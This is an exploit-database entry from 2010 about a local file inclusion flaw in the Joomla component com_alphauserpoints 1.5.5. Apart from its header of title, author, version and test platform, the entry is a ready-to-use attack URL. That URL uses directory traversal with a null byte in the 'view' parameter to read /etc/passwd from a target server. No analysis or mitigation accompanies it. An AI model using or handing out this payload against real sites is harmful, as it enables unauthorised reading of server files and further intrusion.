id: 11723
date: 04/11/2010
title: Joomla Component com_alphauserpoints Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

=======================================================================
Joomla Component com_alphauserpoints Local File Inclusion Vulnerability
=======================================================================

# Exploit Title:
Joomla Component AlphaUserPoints Local File Inclusion Vulnerability
 
# Date:
April 11 2010
 
# Author:
AntiSecurity
 
# Software Link:
http://www.alphaplug.com/
 
# Version:
com_alphauserpoints version 1.5.5
 
# Tested on:
Linux
 
# Target example
http://server/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-22]  #